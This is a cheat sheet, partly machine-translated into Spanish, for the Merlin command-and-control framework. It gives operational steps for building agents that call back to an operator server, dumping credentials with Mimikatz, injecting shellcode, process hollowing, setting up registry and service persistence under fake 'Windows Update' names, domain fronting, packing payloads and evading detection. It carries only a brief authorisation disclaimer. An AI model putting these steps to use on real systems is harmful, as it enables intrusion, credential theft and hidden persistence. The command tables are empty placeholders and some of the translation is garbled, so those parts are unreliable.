Merlin C2 Framework Cheat Sheet¶
Overview¶
Merlin es un servidor y agente de control de comandos HTTP/2 multiplataforma escrito en Golang. Aprovecha HTTP/2 para la comunicación, proporcionando capacidades modernas de evasión de protocolos con el bloqueo de datos incorporado y el cifrado.
▪ restablecimiento Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y ejercicios de equipo rojo solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.
Instalación¶
Pre-compiled Binaries¶
# Download latest release for Linux
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Linux-x64.7z
7z x merlinServer-Linux-x64.7z
# Download latest release for Windows
# Download merlinServer-Windows-x64.7z from GitHub releases
# Download latest release for macOS
wget https://github.com/Ne0nd0g/merlin/releases/latest/download/merlinServer-Darwin-x64.7z
7z x merlinServer-Darwin-x64.7z
Build from Source¶
# Install Go (version 1.19+)
git clone https://github.com/Ne0nd0g/merlin.git
cd merlin
make build-server
make build-agent
Docker Instalación¶
# Pull official Docker image
docker pull ne0nd0g/merlin
# Run Merlin server in Docker
docker run -it -p 443:443 ne0nd0g/merlin
Uso básico¶
Inicio Merlin Server¶
# Start server with default settings
./merlinServer-Linux-x64
# Start server with custom interface
./merlinServer-Linux-x64 -i 0.0.0.0
# Start server with custom port
./merlinServer-Linux-x64 -p 8443
# Start server with custom certificate
./merlinServer-Linux-x64 -crt /path/to/cert.crt -key /path/to/key.key
Agent Generation¶
# Generate Windows agent
make build-agent-windows
# Generate Linux agent
make build-agent-linux
# Generate macOS agent
make build-agent-darwin
Command Reference¶
Server Management¶
| Command | Description |
|---|---|
| INLINE_CODE_31 | Display help menu |
| INLINE_CODE_32 | Show version information |
| INLINE_CODE_33 | List active listeners |
| INLINE_CODE_34 | List connected agents |
| INLINE_CODE_35 | Show active sessions |
| INLINE_CODE_36 | Exit Merlin server |
Listener Management¶
| Command | Description |
|---|---|
| INLINE_CODE_37 | List all listeners |
| INLINE_CODE_38 | Select listener type |
| INLINE_CODE_39 | Set listener option |
| INLINE_CODE_40 | Start the listener |
| INLINE_CODE_41 | Stop the listener |
| INLINE_CODE_42 | Show listener information |
Agente Interaction¶
| Command | Description |
|---|---|
| INLINE_CODE_43 | Interact with agent |
| INLINE_CODE_44 | Execute shell command |
| INLINE_CODE_45 | Upload file to agent |
| INLINE_CODE_46 | Download file from agent |
| INLINE_CODE_47 | Kill the agent |
| INLINE_CODE_48 | Return to main menu |
Configuración del oyente
HTTP/2 Listener¶
# Use HTTP/2 listener
use listener http2
# Configure listener options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key
# Start listener
start
HTTP/3 Listener (QUIC)¶
# Use HTTP/3 listener
use listener http3
# Configure QUIC options
set Interface 0.0.0.0
set Port 443
set Certificate /path/to/cert.crt
set Key /path/to/key.key
# Start listener
start
TCP Listener¶
# Use TCP listener
use listener tcp
# Configure TCP options
set Interface 0.0.0.0
set Port 4444
# Start listener
start
SMB Listener¶
# Use SMB listener (Windows)
use listener smb
# Configure SMB options
set Interface 0.0.0.0
set Port 445
# Start listener
start
Agent Configuration¶
HTTP/2 Agent¶
# Build HTTP/2 agent
GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443" -o agent.exe cmd/merlinagent/main.go
# Build with custom options
GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.1.100:443 -X main.sleep=30s -X main.jitter=0.2" -o agent cmd/merlinagent/main.go
Agent Options¶
# Set communication URL
-X main.url=https://server.com:443
# Set sleep interval
-X main.sleep=30s
# Set jitter percentage
-X main.jitter=0.2
# Set maximum retries
-X main.maxretry=7
# Set user agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Set proxy
-X main.proxy=http://proxy.com:8080
Post-Exploitation Comandos¶
Información del sistema¶
# Get system information
sysinfo
# Get current user
whoami
# Get environment variables
env
# Get network interfaces
ifconfig
# Get running processes
ps
File Operations¶
# List directory contents
ls /path/to/directory
# Change directory
cd /path/to/directory
# Create directory
mkdir /path/to/new/directory
# Remove file
rm /path/to/file
# Copy file
cp /source/file /destination/file
# Move file
mv /source/file /destination/file
Operaciones de red¶
# Network connections
netstat
# ARP table
arp
# Routing table
route
# DNS lookup
nslookup domain.com
# Ping host
ping 192.168.1.1
Process Management¶
# List processes
ps
# Kill process
kill <pid>
# Start process
execute <command>
# Get process information
info <pid>
Características avanzadas¶
Module System¶
# List available modules
modules
# Use module
use module <module-name>
# Set module options
set <option> <value>
# Run module
run
# Show module info
info
Módulos incorporados¶
# Mimikatz module
use module mimikatz
set Command sekurlsa::logonpasswords
run
# PowerShell module
use module powershell
set Command Get-Process
run
# Assembly execution
use module executeassembly
set Assembly /path/to/assembly.exe
set Arguments "arg1 arg2"
run
Shellcode Execution¶
# Execute shellcode
use module shellcode
set Shellcode <base64-encoded-shellcode>
run
# Shellcode injection
use module shinject
set PID <target-pid>
set Shellcode <base64-encoded-shellcode>
run
Persistencia
# Registry persistence
use module persistence
set Method registry
set Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
set Value "Update"
set Data "C:\temp\agent.exe"
run
# Service persistence
use module service
set Name "UpdateService"
set DisplayName "Windows Update Service"
set BinaryPath "C:\temp\agent.exe"
run
Evasion Techniques¶
Traffic Obfuscation¶
# Custom User-Agent
-X main.useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Custom headers
-X main.headers="X-Custom-Header:value"
# Domain fronting
-X main.url=https://cdn.example.com
-X main.host=legitimate-site.com
Payload Obfuscation¶
# Build with custom build tags
go build -tags="debug" -ldflags "-s -w" -o agent.exe
# Use UPX packing
upx --best agent.exe
# Custom encryption
-X main.psk=your-pre-shared-key
Anti-Analysis¶
# VM detection
use module vmdetect
run
# Sandbox evasion
use module sleep
set Duration 60
run
# Process hollowing
use module hollow
set Target notepad.exe
set Payload <base64-encoded-payload>
run
Certificate Management¶
Generate Self-Firmado Certificado¶
# Generate certificate and key
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes
# Generate with SAN
openssl req -new -x509 -keyout server.key -out server.crt -days 365 -nodes -config <(
echo '[req]'
echo 'distinguished_name = req'
echo '[req]'
echo 'CN = server.com'
echo '[SAN]'
echo 'subjectAltName = DNS:server.com,DNS:*.server.com,IP:192.168.1.100'
)
Let's Encrypt Certificate¶
# Install certbot
sudo apt install certbot
# Generate certificate
certbot certonly --standalone -d yourdomain.com
# Use certificate with Merlin
./merlinServer-Linux-x64 -crt /etc/letsencrypt/live/yourdomain.com/fullchain.pem -key /etc/letsencrypt/live/yourdomain.com/privkey.pem
Operational Procedures¶
Infrastructure Setup¶
# Use redirectors
# Set up nginx reverse proxy
server \\\\{
listen 443 ssl http2;
server_name legitimate-site.com;
ssl_certificate /path/to/cert.crt;
ssl_certificate_key /path/to/key.key;
location / \\\\{
proxy_pass https://merlin-server:443;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
\\\\}
\\\\}
Operaciones de equipo¶
# Multi-operator setup
# Use shared database or file system
# Implement proper access controls
# Use separate operator certificates
Logging and Monitoring¶
# Enable detailed logging
./merlinServer-Linux-x64 -debug
# Monitor connections
tail -f merlin.log
# Network monitoring
tcpdump -i any -w merlin_traffic.pcap port 443
Troubleshooting¶
Connection Issues¶
# Check listener status
listeners
# Test connectivity
curl -k https://server.com:443
# Check certificate
openssl s_client -connect server.com:443 -servername server.com
Agent Issues¶
# Debug agent connection
# Build agent with debug flags
go build -ldflags "-X main.debug=true" -o agent-debug.exe
# Check agent logs
# Enable verbose output in agent
Performance Issues¶
# Adjust sleep and jitter
-X main.sleep=10s
-X main.jitter=0.1
# Optimize HTTP/2 settings
# Increase connection limits
# Use connection pooling
Problemas de certificado¶
# Verify certificate
openssl x509 -in server.crt -text -noout
# Check certificate chain
openssl verify -CAfile ca.crt server.crt
# Test SSL configuration
sslscan server.com:443
Detection Evasion¶
Network Level¶
- Utilizar certificados y dominios legítimos
- Implementar la configuración HTTP/2 adecuada
- Patrones de comunicación y tiempo
- Usar técnicas de frente de dominio
- Implementar un correcto manejo de errores
Host Level¶
- Usar nombres y caminos legítimos de procesos
- Implementar anti-VM y detección de cajas de arena
- Uso del proceso de hundimiento e inyección
- Encrypt payloads and communications
- Limpiar artefactos y registros
Behavioral¶
- Limitar el uso de recursos y la actividad de red
- Usar agentes y encabezados legítimos de usuario
- Ejecutar el sueño adecuado y el jitter
- Evitar llamadas de API sospechosas
- Usar técnicas de vida fuera de la tierra
Resources¶
[Merlin GitHub Repository](URL_55_ - [Merlin Documentation](URL_56__ - [Ne0nd0g Blog] - [HTTP/2 C2 Communication](URL_58__
-...
*Esta hoja de trampa proporciona una referencia completa para usar Merlin C2 Framework. Siempre asegúrese de tener una autorización adecuada antes de usar esta herramienta en cualquier entorno. *